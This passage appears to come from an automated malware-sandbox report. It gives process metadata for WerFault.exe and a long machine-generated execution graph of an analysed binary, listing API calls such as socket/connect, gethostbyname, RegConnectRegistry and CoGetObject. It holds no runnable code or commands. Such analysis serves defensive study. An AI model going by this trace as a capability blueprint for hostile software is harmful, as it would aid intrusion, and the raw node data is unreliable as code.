                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7792 -s 3044
                                                                                                                              Imagebase:0xfd0000
                                                                                                                              File size:483'680 bytes
                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Disassembly

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:4.1%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:11.7%
                                                                                                                                Total number of Nodes:2000
                                                                                                                                Total number of Limit Nodes:48
                                                                                                                                execution_graph 107477 f81edb 107482 f1131c 107477->107482 107483 f1133e 107482->107483 107516 f11624 107483->107516 107490 f1d3d2 48 API calls 107491 f11388 107490->107491 107492 f1d3d2 48 API calls 107491->107492 107493 f11392 107492->107493 107494 f1d3d2 48 API calls 107493->107494 107495 f113d8 107494->107495 107496 f1d3d2 48 API calls 107495->107496 107497 f114bb 107496->107497 107529 f11673 107497->107529 107567 f117e0 107516->107567 107520 f11344 107521 f116db 107520->107521 107633 f11867 6 API calls 107521->107633 107523 f11374 107524 f1d3d2 107523->107524 107525 f3010a 48 API calls 107524->107525 107526 f1d3f3 107525->107526 107527 f3010a 48 API calls 107526->107527 107528 f1137e 107527->107528 107528->107490 107530 f1d3d2 48 API calls 107529->107530 107531 f11683 107530->107531 107583 f117fc 107567->107583 107570 f117fc 48 API calls 107571 f117f0 107570->107571 107572 f1d3d2 48 API calls 107571->107572 107573 f1165b 107572->107573 107574 f17e53 107573->107574 107575 f17ecf 107574->107575 107576 f17e5f __wsetenvp 107574->107576 107594 f1a2fb 107575->107594 107578 f17ec7 107576->107578 107579 f17e7b 107576->107579 107593 f17eda 48 API calls 107578->107593 107590 f1a6f8 107579->107590 107582 f17e85 _memmove 107582->107520 107584 f1d3d2 48 API calls 107583->107584 107585 f11807 107584->107585 107586 f1d3d2 48 API calls 107585->107586 107587 f1180f 107586->107587 107588 f1d3d2 48 API calls 107587->107588 107589 f117e8 107588->107589 107589->107570 107598 f3010a 107590->107598 107592 f1a702 107592->107582 107593->107582 107595 f1a309 107594->107595 107597 f1a321 _memmove 107594->107597 107595->107597 107629 f1b8a7 107595->107629 107597->107582 107600 f30112 __calloc_impl 107598->107600 107601 f3012c 107600->107601 107602 f3012e std::exception::exception 107600->107602 107607 f345ec 107600->107607 107601->107592 107621 f37495 RaiseException 107602->107621 107604 f30158 107622 f373cb 47 API calls _free 107604->107622 107606 f3016a 107606->107592 107608 f34667 __calloc_impl 107607->107608 107616 f345f8 __calloc_impl 107607->107616 107628 f3889e 47 API calls __getptd_noexit 107608->107628 107611 f3462b RtlAllocateHeap 107612 f3465f 107611->107612 107611->107616 107612->107600 107614 f34603 107614->107616 107623 f38e52 47 API calls 2 library calls 107614->107623 107624 f38eb2 47 API calls 8 library calls 107614->107624 107625 f31d65 GetModuleHandleExW 6C3C6DE0 ExitProcess ___crtCorExitProcess 107614->107625 107615 f34653 107626 f3889e 47 API calls __getptd_noexit 107615->107626 107616->107611 107616->107614 107616->107615 107619 f34651 107616->107619 107627 f3889e 47 API calls __getptd_noexit 107619->107627 107621->107604 107622->107606 107623->107614 107624->107614 107626->107619 107627->107612 107628->107612 107630 f1b8ba 107629->107630 107632 f1b8b7 _memmove 107629->107632 107631 f3010a 48 API calls 107630->107631 107631->107632 107632->107597 107633->107523 107641 f8c05b 107642 f8c05d 107641->107642 107645 f578ee WSAStartup 107642->107645 107644 f8c066 107646 f57917 gethostname gethostbyname 107645->107646 107647 f579b1 _wcscpy 107645->107647 107646->107647 107648 f5793a _memmove 107646->107648 107647->107644 107649 f57970 inet_ntoa 107648->107649 107653 f57952 _wcscpy 107648->107653 107650 f57989 _strcat 107649->107650 107654 f58553 107650->107654 107651 f579a9 WSACleanup 107651->107647 107653->107651 107656 f58561 107654->107656 107658 f58565 _strlen 107654->107658 107655 f58574 MultiByteToWideChar 107655->107656 107657 f5858a 107655->107657 107656->107653 107659 f3010a 48 API calls 107657->107659 107658->107655 107660 f585a6 MultiByteToWideChar 107659->107660 107660->107656 107661 f84ddc 107662 f24472 107661->107662 107663 f84de6 VariantClear 107661->107663 107663->107662 107664 f1e834 107667 f22b40 107664->107667 107666 f1e840 107668 f22b98 107667->107668 107728 f22bfc __wsetenvp _memmove 107667->107728 107669 f22bbf 107668->107669 107671 f233cb 107668->107671 107672 f87cf3 107668->107672 107670 f3010a 48 API calls 107669->107670 107674 f22be8 107670->107674 107760 f15577 401 API calls Mailbox 107671->107760 107673 f87cf8 107672->107673 107680 f87d15 107672->107680 107673->107669 107676 f87d01 107673->107676 107677 f3010a 48 API calls 107674->107677 107774 f6d443 401 API calls Mailbox 107676->107774 107677->107728 107683 f87d38 107680->107683 107775 f6d8ff 401 API calls 2 library calls 107680->107775 107776 f5d520 85 API calls 4 library calls 107683->107776 107684 f88518 107684->107666 107685 f884df 107804 f5d520 85 API calls 4 library calls 107685->107804 107686 f883d1 107793 f5d520 85 API calls 4 library calls 107686->107793 107690 f87e43 107777 f5d520 85 API calls 4 library calls 107690->107777 107691 f883eb 107794 f5d520 85 API calls 4 library calls 107691->107794 107694 f88434 107796 f5d520 85 API calls 4 library calls 107694->107796 107696 f1d349 53 API calls 107696->107728 107697 f1d3d2 48 API calls 107697->107728 107698 f8844e 107797 f5d520 85 API calls 4 library calls 107698->107797 107699 f1d2d2 53 API calls 107699->107728 107703 f2345e 107795 f5d520 85 API calls 4 library calls 107703->107795 107704 f884b5 107802 f5d520 85 API calls 4 library calls 107704->107802 107706 f884c8 107803 f5d520 85 API calls 4 library calls 107706->107803 107709 f31b2a 52 API calls __cinit 107709->107728 107710 f2366d 107805 f5d520 85 API calls 4 library calls 107710->107805 107712 f17e53 48 API calls 107712->107728 107715 f881d7 107790 f6d154 48 API calls 107715->107790 107716 f1fa40 401 API calls 107716->107728 107718 f23637 107798 f5d520 85 API calls 4 library calls 107718->107798 107719 f884a4 107801 f5d520 85 API calls 4 library calls 107719->107801 107721 f23157 107721->107666 107724 f8822c 107792 f1346e 48 API calls 107724->107792 107725 f1cdb4 48 API calls 107725->107728 107727 f1c935 48 API calls 107727->107728 107728->107685 107728->107686 107728->107690 107728->107691 107728->107694 107728->107696 107728->107697 107728->107698 107728->107699 107728->107703 107728->107704 107728->107706 107728->107709 107728->107710 107728->107712 107728->107715 107728->107716 107728->107718 107728->107719 107728->107721 107728->107725 107728->107727 107731 f8826c 107728->107731 107736 f3010a 48 API calls 107728->107736 107739 f4a599 InterlockedDecrement 107728->107739 107742 f1ca8e 107728->107742 107756 f1d380 107728->107756 107761 f1346e 48 API calls 107728->107761 107762 f13320 107728->107762 107773 f1203a 401 API calls 107728->107773 107778 f1d89e 107728->107778 107788 f6d154 48 API calls 107728->107788 107789 f5ab1c 50 API calls 107728->107789 107731->107721 107800 f5d520 85 API calls 4 library calls 107731->107800 107732 f881ea 107732->107724 107791 f6d154 48 API calls 107732->107791 107734 f88259 107735 f13320 48 API calls 107734->107735 107738 f88261 107735->107738 107736->107728 107737 f88236 107737->107718 107737->107734 107738->107731 107740 f88478 107738->107740 107739->107728 107799 f5d520 85 API calls 4 library calls 107740->107799 107743 f1cad0 107742->107743 107744 f1ca9a 107742->107744 107745 f1cae3 107743->107745 107746 f1cad9 107743->107746 107750 f3010a 48 API calls 107744->107750 107810 f1c4cd 107745->107810 107747 f17e53 48 API calls 107746->107747 107749 f1cac6 107747->107749 107749->107728 107751 f1caad 107750->107751 107752 f84f11 107751->107752 107753 f1cab8 107751->107753 107752->107749 107754 f1d3d2 48 API calls 107752->107754 107753->107749 107806 f1caee 107753->107806 107754->107749 107757 f1d38b 107756->107757 107758 f1d3b4 107757->107758 107814 f1d772 55 API calls 107757->107814 107758->107728 107760->107721 107761->107728 107763 f13334 107762->107763 107765 f13339 Mailbox 107762->107765 107815 f1342c 48 API calls 107763->107815 107770 f13347 107765->107770 107816 f1346e 48 API calls 107765->107816 107767 f3010a 48 API calls 107769 f133d8 107767->107769 107768 f13422 107768->107728 107771 f3010a 48 API calls 107769->107771 107770->107767 107770->107768 107772 f133e3 107771->107772 107772->107728 107773->107728 107774->107721 107775->107683 107776->107728 107777->107721 107779 f1d8ac 107778->107779 107786 f1d8db Mailbox 107778->107786 107780 f1d8ff 107779->107780 107782 f1d8b2 Mailbox 107779->107782 107817 f1c935 107780->107817 107783 f1d8c7 107782->107783 107784 f84e9b 107782->107784 107785 f84e72 VariantClear 107783->107785 107783->107786 107784->107786 107821 f4a599 InterlockedDecrement 107784->107821 107785->107786 107786->107728 107788->107728 107789->107728 107790->107732 107791->107732 107792->107737 107793->107691 107794->107721 107795->107721 107796->107698 107797->107721 107798->107721 107799->107721 107800->107721 107801->107721 107802->107721 107803->107721 107804->107721 107805->107684 107807 f1cafd __wsetenvp _memmove 107806->107807 107808 f3010a 48 API calls 107807->107808 107809 f1cb3b 107808->107809 107809->107749 107811 f1c4e7 107810->107811 107812 f1c4da 107810->107812 107813 f3010a 48 API calls 107811->107813 107812->107749 107813->107812 107814->107758 107815->107765 107816->107770 107818 f1c940 107817->107818 107819 f1c948 107817->107819 107822 f1d805 107818->107822 107819->107786 107821->107786 107823 f1d828 _memmove 107822->107823 107824 f1d815 107822->107824 107823->107819 107824->107823 107825 f3010a 48 API calls 107824->107825 107825->107823 107826 f20ff7 108286 f2e016 107826->108286 107828 f2100d 108295 f2e08f 107828->108295 107830 f2103d 107834 f1fbf1 Mailbox 107830->107834 108314 f5d520 85 API calls 4 library calls 107830->108314 107833 f3010a 48 API calls 107864 f1fad8 Mailbox _memmove 107833->107864 107836 f2105e 107844 f1c935 48 API calls 107836->107844 107837 f1c935 48 API calls 107837->107864 107838 f20dee 107845 f1d89e 50 API calls 107838->107845 107840 f21063 108315 f5d520 85 API calls 4 library calls 107840->108315 107841 f20dfa 107846 f1d89e 50 API calls 107841->107846 107842 f8b772 108317 f5d520 85 API calls 4 library calls 107842->108317 107843 f20119 108316 f5d520 85 API calls 4 library calls 107843->108316 107844->107834 107845->107841 107852 f20e83 107846->107852 107848 f4a599 InterlockedDecrement 107848->107864 107849 f1d3d2 48 API calls 107849->107864 107851 f8b7d2 107854 f1caee 48 API calls 107852->107854 107853 f31b2a 52 API calls __cinit 107853->107864 107863 f210f1 Mailbox 107854->107863 107861 f8b583 108312 f5d520 85 API calls 4 library calls 107861->108312 108313 f5d520 85 API calls 4 library calls 107863->108313 107864->107830 107864->107833 107864->107834 107864->107836 107864->107837 107864->107838 107864->107840 107864->107841 107864->107842 107864->107843 107864->107848 107864->107849 107864->107852 107864->107853 107864->107861 107864->107863 107882 f1f6d0 107864->107882 107954 f1fa40 107864->107954 108009 f2f03e 107864->108009 108012 f150a3 107864->108012 108017 f71f19 107864->108017 108020 f68065 GetCursorPos GetForegroundWindow 107864->108020 108034 f710e5 107864->108034 108040 f69122 107864->108040 108054 f2ef0d 107864->108054 108097 f2f461 107864->108097 108135 f6b74b VariantInit 107864->108135 108176 f2dd84 107864->108176 108179 f6013f 107864->108179 108192 f692c0 107864->108192 108210 f7798d 107864->108210 108215 f7804e 107864->108215 108229 f70bfa 107864->108229 108232 f730ad 107864->108232 108281 f717aa 107864->108281 108307 f21620 59 API calls Mailbox 107864->108307 108308 f6ee52 81 API calls 2 library calls 107864->108308 108309 f6ef9d 89 API calls Mailbox 107864->108309 108310 f5b020 48 API calls 107864->108310 108311 f6e713 401 API calls Mailbox 107864->108311 107883 f1f708 107882->107883 107888 f1f77b 107882->107888 107884 f1f712 107883->107884 107885 f8c4d5 107883->107885 107886 f1f71c 107884->107886 107902 f8c544 107884->107902 107890 f8c4e2 107885->107890 107891 f8c4f4 107885->107891 107893 f8c6a4 107886->107893 107906 f1f72a 107886->107906 107949 f1f741 107886->107949 107887 f1fa40 401 API calls 107926 f1f787 107887->107926 107889 f8c253 107888->107889 107888->107926 108357 f5d520 85 API calls 4 library calls 107889->108357 108318 f6f34f 107890->108318 108362 f6c235 401 API calls Mailbox 107891->108362 107899 f1c935 48 API calls 107893->107899 107894 f8c585 107903 f8c590 107894->107903 107904 f8c5a4 107894->107904 107897 f8c264 107897->107864 107898 f8c507 107901 f8c50b 107898->107901 107898->107949 107899->107949 108363 f5d520 85 API calls 4 library calls 107901->108363 107902->107894 107914 f8c569 107902->107914 107907 f6f34f 401 API calls 107903->107907 108365 f6d154 48 API calls 107904->108365 107906->107949 108463 f4a599 InterlockedDecrement 107906->108463 107907->107949 107909 f8c45a 107913 f1c935 48 API calls 107909->107913 107911 f8c7b5 107918 f8c7eb 107911->107918 108485 f6ef9d 89 API calls Mailbox 107911->108485 107912 f8c5af 107925 f8c62c 107912->107925 107938 f8c5d1 107912->107938 107913->107949 108364 f5d520 85 API calls 4 library calls 107914->108364 107915 f1f84a 107920 f8c32a 107915->107920 107933 f1f854 107915->107933 107923 f1d89e 50 API calls 107918->107923 108358 f1342c 48 API calls 107920->108358 107921 f8c793 108465 f184a6 107921->108465 107951 f1f770 Mailbox 107923->107951 108390 f5afce 48 API calls 107925->108390 107926->107887 107926->107915 107929 f1f8bb 107926->107929 107931 f32241 48 API calls 107926->107931 107937 f1f9d8 107926->107937 107926->107951 107927 f8c7c9 107932 f184a6 80 API calls 107927->107932 107929->107897 107929->107909 107929->107949 108359 f4a599 InterlockedDecrement 107929->108359 108361 f6f4df 401 API calls 107929->108361 107931->107926 107944 f8c7d1 __wsetenvp 107932->107944 108341 f214a0 107933->108341 107935 f1f8ab 107935->107929 107935->107937 108360 f5d520 85 API calls 4 library calls 107937->108360 108366 f5a485 48 API calls 107938->108366 107939 f8c63e 108391 f2df08 48 API calls 107939->108391 107940 f8c79b __wsetenvp 107940->107911 107942 f1d89e 50 API calls 107940->107942 107942->107911 107944->107918 107947 f1d89e 50 API calls 107944->107947 107945 f8c647 Mailbox 108392 f5a485 48 API calls 107945->108392 107946 f8c5f6 108367 f244e0 107946->108367 107947->107918 107949->107911 107949->107951 108464 f6ee52 81 API calls 2 library calls 107949->108464 107951->107864 107952 f8c663 108393 f23680 107952->108393 107955 f1fa60 107954->107955 107963 f1fa8e Mailbox _memmove 107954->107963 107956 f3010a 48 API calls 107955->107956 107956->107963 107957 f31b2a 52 API calls __cinit 107957->107963 107958 f2105e 107959 f1c935 48 API calls 107958->107959 107966 f1fbf1 Mailbox 107959->107966 107960 f21230 107960->107966 109320 f5d520 85 API calls 4 library calls 107960->109320 107961 f1d3d2 48 API calls 107961->107963 107962 f20119 109322 f5d520 85 API calls 4 library calls 107962->109322 107963->107957 107963->107958 107963->107960 107963->107961 107963->107962 107963->107966 107967 f20dee 107963->107967 107969 f21063 107963->107969 107970 f20dfa 107963->107970 107971 f8b772 107963->107971 107973 f1c935 48 API calls 107963->107973 107975 f1f6d0 401 API calls 107963->107975 107979 f20e83 107963->107979 107984 f3010a 48 API calls 107963->107984 107985 f1fa40 401 API calls 107963->107985 107988 f4a599 InterlockedDecrement 107963->107988 107989 f8b583 107963->107989 107991 f210f1 Mailbox 107963->107991 107992 f6013f 86 API calls 107963->107992 107993 f2f03e 2 API calls 107963->107993 107994 f70bfa 128 API calls 107963->107994 107995 f71f19 129 API calls 107963->107995 107996 f150a3 49 API calls 107963->107996 107997 f710e5 81 API calls 107963->107997 107998 f68065 55 API calls 107963->107998 107999 f2f461 97 API calls 107963->107999 108000 f69122 90 API calls 107963->108000 108001 f692c0 87 API calls 107963->108001 108002 f2dd84 3 API calls 107963->108002 108003 f7804e 112 API calls 107963->108003 108004 f7798d 108 API calls 107963->108004 108005 f730ad 89 API calls 107963->108005 108006 f6b74b 401 API calls 107963->108006 108007 f717aa 86 API calls 107963->108007 108008 f2ef0d 93 API calls 107963->108008 109313 f21620 59 API calls Mailbox 107963->109313 109314 f6ee52 81 API calls 2 library calls 107963->109314 109315 f6ef9d 89 API calls Mailbox 107963->109315 109316 f5b020 48 API calls 107963->109316 109317 f6e713 401 API calls Mailbox 107963->109317 107966->107864 107972 f1d89e 50 API calls 107967->107972 109321 f5d520 85 API calls 4 library calls 107969->109321 107974 f1d89e 50 API calls 107970->107974 109323 f5d520 85 API calls 4 library calls 107971->109323 107972->107970 107973->107963 107974->107979 107975->107963 107978 f8b7d2 107980 f1caee 48 API calls 107979->107980 107980->107991 107984->107963 107985->107963 107988->107963 109318 f5d520 85 API calls 4 library calls 107989->109318 109319 f5d520 85 API calls 4 library calls 107991->109319 107992->107963 107993->107963 107994->107963 107995->107963 107996->107963 107997->107963 107998->107963 107999->107963 108000->107963 108001->107963 108002->107963 108003->107963 108004->107963 108005->107963 108006->107963 108007->107963 108008->107963 108010 f2f0b5 2 API calls 108009->108010 108011 f2f046 108010->108011 108011->107864 108013 f3010a 48 API calls 108012->108013 108014 f150b3 108013->108014 108015 f150ec CloseHandle 108014->108015 108016 f150be 108015->108016 108016->107864 109324 f723c5 108017->109324 109408 f66b19 108020->109408 108023 f680a5 108024 f13320 48 API calls 108023->108024 108025 f680b3 108024->108025 109413 f22320 50 API calls 108025->109413 108026 f68102 108028 f1cdb4 48 API calls 108026->108028 108033 f680f5 108026->108033 108030 f6812b 108028->108030 108029 f680cf 109414 f22320 50 API calls 108029->109414 108032 f1cdb4 48 API calls 108030->108032 108030->108033 108032->108033 108033->107864 108035 f184a6 80 API calls 108034->108035 108036 f710fb LoadLibraryW 108035->108036 108037 f7111e 108036->108037 108038 f7110f 108036->108038 108037->108038 109415 f728d9 48 API calls _memmove 108037->109415 108038->107864 108041 f184a6 80 API calls 108040->108041 108042 f6913f 108041->108042 108043 f1cdb4 48 API calls 108042->108043 108044 f69149 108043->108044 109416 f6acd3 108044->109416 108046 f69156 108047 f6915a socket 108046->108047 108051 f69182 108046->108051 108048 f69184 connect 108047->108048 108049 f6916d WSAGetLastError 108047->108049 108050 f691a3 WSAGetLastError 108048->108050 108048->108051 108049->108051 109422 f5d7e4 108050->109422 108051->107864 108053 f691b8 closesocket 108053->108051 108055 f1ca8e 48 API calls 108054->108055 108056 f2ef25 108055->108056 108057 f2effb 108056->108057 108058 f2ef3e 108056->108058 108059 f3010a 48 API calls 108057->108059 109466 f2f0f3 48 API calls 108058->109466 108061 f2f002 108059->108061 108062 f2f00e 108061->108062 109468 f15080 49 API calls 108061->109468 108066 f184a6 80 API calls 108062->108066 108064 f2ef73 108067 f2f03e 2 API calls 108064->108067 108065 f2ef4d 108065->108064 108068 f86942 108065->108068 108069 f1cdb4 48 API calls 108065->108069 108070 f2f01c 108066->108070 108071 f2ef7a 108067->108071 108068->107864 108072 f86965 108069->108072 108073 f14bf9 56 API calls 108070->108073 108075 f2ef87 108071->108075 108076 f86980 108071->108076 108072->108064 108077 f8696d 108072->108077 108074 f2f02b 108073->108074 108074->108065 108078 f86936 108074->108078 108080 f1d3d2 48 API calls 108075->108080 108079 f3010a 48 API calls 108076->108079 108081 f1cdb4 48 API calls 108077->108081 108078->108068 109469 f14592 CloseHandle 108078->109469 108082 f86986 108079->108082 108083 f2ef8f 108080->108083 108081->108071 108084 f8699f 108082->108084 109470 f13d65 ReadFile SetFilePointerEx 108082->109470 109437 f2f04e 108083->109437 108091 f869a3 _memmove 108084->108091 109471 f5ad14 48 API calls _memset 108084->109471 108088 f2ef9e 108088->108091 109460 f17bef 108088->109460 108092 f2efb2 Mailbox 108093 f2eff2 108092->108093 108094 f150ec CloseHandle 108092->108094 108093->107864 108095 f2efe4 108094->108095 109467 f14592 CloseHandle 108095->109467 108098 f2f47f 108097->108098 108099 f2f48a 108097->108099 108100 f1cdb4 48 API calls 108098->108100 108102 f184a6 80 API calls 108099->108102 108133 f2f498 Mailbox 108099->108133 108100->108099 108101 f3010a 48 API calls 108103 f2f49f 108101->108103 108105 f86841 108102->108105 108104 f2f4af 108103->108104 109514 f15080 49 API calls 108103->109514 108108 f184a6 80 API calls 108104->108108 108107 f3297d __wsplitpath 47 API calls 108105->108107 108109 f86859 108107->108109 108110 f2f4bf 108108->108110 108111 f1caee 48 API calls 108109->108111 108112 f14bf9 56 API calls 108110->108112 108113 f8686a 108111->108113 108114 f2f4ce 108112->108114 109521 f139e8 48 API calls 2 library calls 108113->109521 108116 f2f4d6 108114->108116 108117 f868d4 GetLastError 108114->108117 108120 f2f4f0 108116->108120 108121 f86920 108116->108121 108124 f868ed 108117->108124 108118 f86878 108132 f86895 108118->108132 109522 f56f4b GetFileAttributesW FindFirstFileW FindClose 108118->109522 108119 f1cdb4 48 API calls 108119->108133 108125 f3010a 48 API calls 108120->108125 108126 f3010a 48 API calls 108121->108126 108123 f86888 108130 f56d6d 52 API calls 108123->108130 108123->108132 108124->108116 109523 f14592 CloseHandle 108124->109523 108128 f2f4f5 108125->108128 108129 f86925 108126->108129 109515 f1197e 108128->109515 108130->108132 108132->108119 108133->108101 108134 f2f50a Mailbox 108133->108134 108134->107864 108136 f1ca8e 48 API calls 108135->108136 108137 f6b7a3 CoInitialize 108136->108137 108138 f6b7ae CoUninitialize 108137->108138 108140 f6b7b4 108137->108140 108138->108140 108139 f6b7d5 108142 f6b81b 108139->108142 108144 f184a6 80 API calls 108139->108144 108140->108139 108141 f1ca8e 48 API calls 108140->108141 108141->108139 108143 f184a6 80 API calls 108142->108143 108145 f6b827 108143->108145 108146 f6b7ef 108144->108146 108149 f6b9d3 SetErrorMode CoGetInstanceFromFile 108145->108149 108161 f6b861 108145->108161 109524 f4a857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 108146->109524 108148 f6b802 108148->108142 108150 f6b807 108148->108150 108152 f6ba1f CoGetObject 108149->108152 108153 f6ba19 SetErrorMode 108149->108153 109525 f6c235 401 API calls Mailbox 108150->109525 108151 f6b8a8 GetRunningObjectTable 108155 f6b8cb 108151->108155 108156 f6b8b8 108151->108156 108152->108153 108158 f6baa8 108152->108158 108163 f6b9b1 108153->108163 109526 f6c235 401 API calls Mailbox 108155->109526 108156->108155 108175 f6b8ed 108156->108175 109530 f6c235 401 API calls Mailbox 108158->109530 108159 f6bad0 VariantClear 108159->107864 108161->108151 108166 f6b89a 108161->108166 108168 f1cdb4 48 API calls 108161->108168 108163->108158 108164 f6ba53 108163->108164 108173 f6ba6f 108164->108173 109528 f4ac4b 51 API calls Mailbox 108164->109528 108165 f6b814 Mailbox 108165->108159 108166->108151 108167 f6bac2 SetErrorMode 108167->108165 108171 f6b88a 108168->108171 108171->108166 108172 f1cdb4 48 API calls 108171->108172 108172->108166 109529 f5a6f6 102 API calls 108173->109529 108175->108163 109527 f4ac4b 51 API calls Mailbox 108175->109527 109531 f2dd92 GetFileAttributesW 108176->109531 108180 f60157 108179->108180 108181 f6015e 108179->108181 108183 f184a6 80 API calls 108180->108183 108182 f184a6 80 API calls 108181->108182 108182->108180 108184 f6017c 108183->108184 109536 f576db GetFileVersionInfoSizeW 108184->109536 108186 f6018d 108187 f60192 108186->108187 108189 f601a3 _wcscmp 108186->108189 108188 f1ca8e 48 API calls 108187->108188 108191 f601a1 108188->108191 108190 f1ca8e 48 API calls 108189->108190 108190->108191 108191->107864 108193 f1a6d4 48 API calls 108192->108193 108194 f692d2 108193->108194 108195 f184a6 80 API calls 108194->108195 108196 f692e1 108195->108196 108197 f2f26b 50 API calls 108196->108197 108198 f692ed gethostbyname 108197->108198 108199 f6931d _memmove 108198->108199 108200 f692fa WSAGetLastError 108198->108200 108202 f6932d inet_ntoa 108199->108202 108201 f6930e 108200->108201 108203 f1ca8e 48 API calls 108201->108203 109552 f6adca 48 API calls 2 library calls 108202->109552 108208 f6931b Mailbox 108203->108208 108205 f69342 109553 f6ae5a 50 API calls 108205->109553 108207 f6934e 108209 f17bef 48 API calls 108207->108209 108208->107864 108209->108208 109554 f119ee 108210->109554 108214 f779a4 108214->107864 108216 f119ee 82 API calls 108215->108216 108217 f78062 108216->108217 108218 f11dce 106 API calls 108217->108218 108219 f7806b 108218->108219 108220 f78091 108219->108220 108221 f7806f 108219->108221 108222 f1d3d2 48 API calls 108220->108222 108223 f1ca8e 48 API calls 108221->108223 108224 f7809a 108222->108224 108228 f7808f Mailbox 108223->108228 109672 f4e2e8 108224->109672 108226 f780aa 108227 f17bef 48 API calls 108226->108227 108227->108228 108228->107864 109697 f6f79f 108229->109697 108231 f70c0a 108231->107864 108233 f1ca8e 48 API calls 108232->108233 108234 f730ca 108233->108234 108235 f1d3d2 48 API calls 108234->108235 108236 f730d3 108235->108236 108237 f1d3d2 48 API calls 108236->108237 108238 f730dc 108237->108238 108239 f1d3d2 48 API calls 108238->108239 108240 f730e5 108239->108240 108241 f184a6 80 API calls 108240->108241 108242 f730f4 108241->108242 108243 f73d7b 48 API calls 108242->108243 108244 f73128 108243->108244 108245 f73af7 49 API calls 108244->108245 108246 f73159 108245->108246 108247 f7319c RegOpenKeyExW 108246->108247 108248 f73172 RegConnectRegistryW 108246->108248 108279 f7315d Mailbox 108246->108279 108250 f731f7 108247->108250 108247->108279 108248->108247 108248->108279 108251 f184a6 80 API calls 108250->108251 108252 f73207 RegQueryValueExW 108251->108252 108253 f7323e 108252->108253 108252->108279 108254 f73265 108253->108254 108255 f7344c 108253->108255 108253->108279 108256 f7326e 108254->108256 108257 f733d9 108254->108257 108258 f3010a 48 API calls 108255->108258 108261 f7338d 108256->108261 108262 f73279 108256->108262 109772 f5ad14 48 API calls _memset 108257->109772 108259 f73464 108258->108259 108263 f184a6 80 API calls 108259->108263 108267 f184a6 80 API calls 108261->108267 108265 f732de 108262->108265 108266 f7327e 108262->108266 108269 f73479 RegQueryValueExW 108263->108269 108264 f733e4 108270 f184a6 80 API calls 108264->108270 108268 f3010a 48 API calls 108265->108268 108274 f184a6 80 API calls 108266->108274 108266->108279 108271 f733a1 RegQueryValueExW 108267->108271 108272 f732f7 108268->108272 108269->108279 108280 f73331 108269->108280 108273 f733f6 RegQueryValueExW 108270->108273 108271->108279 108275 f184a6 80 API calls 108272->108275 108273->108279 108276 f7329f RegQueryValueExW 108274->108276 108277 f7330c RegQueryValueExW 108275->108277 108276->108279 108277->108279 108277->108280 108278 f1ca8e 48 API calls 108278->108279 108279->107864 108280->108278 108282 f184a6 80 API calls 108281->108282 108283 f717c7 108282->108283 108284 f56f5b 63 API calls 108283->108284 108285 f717d8 108284->108285 108285->107864 108287 f2e022 108286->108287 108288 f2e034 108286->108288 108289 f1d89e 50 API calls 108287->108289 108290 f2e063 108288->108290 108291 f2e03a 108288->108291 108294 f2e02c 108289->108294 108292 f1d89e 50 API calls 108290->108292 108293 f3010a 48 API calls 108291->108293 108292->108294 108293->108294 108294->107828 109773 f17b6e 48 API calls 108295->109773 108297 f2e0b4 _wcscmp 108298 f1caee 48 API calls 108297->108298 108300 f2e0e2 Mailbox 108297->108300 108299 f8b9c7 108298->108299 109774 f17b4b 48 API calls Mailbox 108299->109774 108300->107864 108302 f8b9d5 108303 f1d2d2 53 API calls 108302->108303 108304 f8b9e7 108303->108304 108305 f1d89e 50 API calls 108304->108305 108306 f8b9ec Mailbox 108304->108306 108305->108306 108306->107864 108307->107864 108308->107864 108309->107864 108310->107864 108311->107864 108312->107863 108313->107834 108314->107840 108315->107843 108316->107842 108317->107851 108319 f1d3d2 48 API calls 108318->108319 108320 f6f389 Mailbox 108319->108320 108322 f6f3e1 108320->108322 108323 f6f3cd 108320->108323 108337 f6f3a9 108320->108337 108321 f1d89e 50 API calls 108334 f6f421 Mailbox 108321->108334 108325 f1c935 48 API calls 108322->108325 108324 f17e53 48 API calls 108323->108324 108326 f6f3df 108324->108326 108325->108326 108327 f6f429 108326->108327 108492 f6cdb5 401 API calls 108326->108492 108486 f6cd12 108327->108486 108330 f6f410 108330->108327 108331 f6f414 108330->108331 108493 f5d338 85 API calls 4 library calls 108331->108493 108332 f6f44b 108335 f6f4a2 108332->108335 108338 f6f457 108332->108338 108334->107949 108336 f6f34f 401 API calls 108335->108336 108336->108334 108337->108321 108338->108337 108339 f6f476 108338->108339 108340 f1ca8e 48 API calls 108339->108340 108340->108334 108342 f21606 108341->108342 108343 f214b2 108341->108343 108342->107935 108345 f3010a 48 API calls 108343->108345 108355 f214be 108343->108355 108346 f85299 108345->108346 108347 f3010a 48 API calls 108346->108347 108356 f852a4 108347->108356 108348 f214c9 108349 f2156d 108348->108349 108350 f3010a 48 API calls 108348->108350 108349->107935 108351 f215af 108350->108351 108352 f215c2 108351->108352 108558 f2d6b4 48 API calls 108351->108558 108352->107935 108354 f3010a 48 API calls 108354->108356 108355->108348 108559 f1346e 48 API calls 108355->108559 108356->108354 108356->108355 108357->107897 108358->107929 108359->107929 108360->107951 108361->107929 108362->107898 108363->107951 108364->107951 108365->107912 108366->107946 108368 f24537 108367->108368 108369 f2469f 108367->108369 108370 f24543 108368->108370 108371 f87820 108368->108371 108372 f1caee 48 API calls 108369->108372 108560 f24040 108370->108560 108723 f6e713 401 API calls Mailbox 108371->108723 108379 f245e4 Mailbox 108372->108379 108375 f8782c 108376 f24639 Mailbox 108375->108376 108724 f5d520 85 API calls 4 library calls 108375->108724 108376->107949 108378 f24559 108378->108375 108378->108376 108378->108379 108389 f71f19 129 API calls 108379->108389 108575 f69500 108379->108575 108584 f5efcd 108379->108584 108618 f66fc3 108379->108618 108621 f61080 108379->108621 108624 f695af WSAStartup 108379->108624 108626 f2f55e 108379->108626 108635 f150ec 108379->108635 108639 f7352a 108379->108639 108718 f5dce9 108379->108718 108389->108376 108390->107939 108391->107945 108392->107952 109269 f1a9a0 108393->109269 108395 f236e7 108396 f8a269 108395->108396 108397 f23778 108395->108397 108455 f23aa8 108395->108455 109286 f5d520 85 API calls 4 library calls 108396->109286 109281 f2bc04 85 API calls 108397->109281 108398 f23ab5 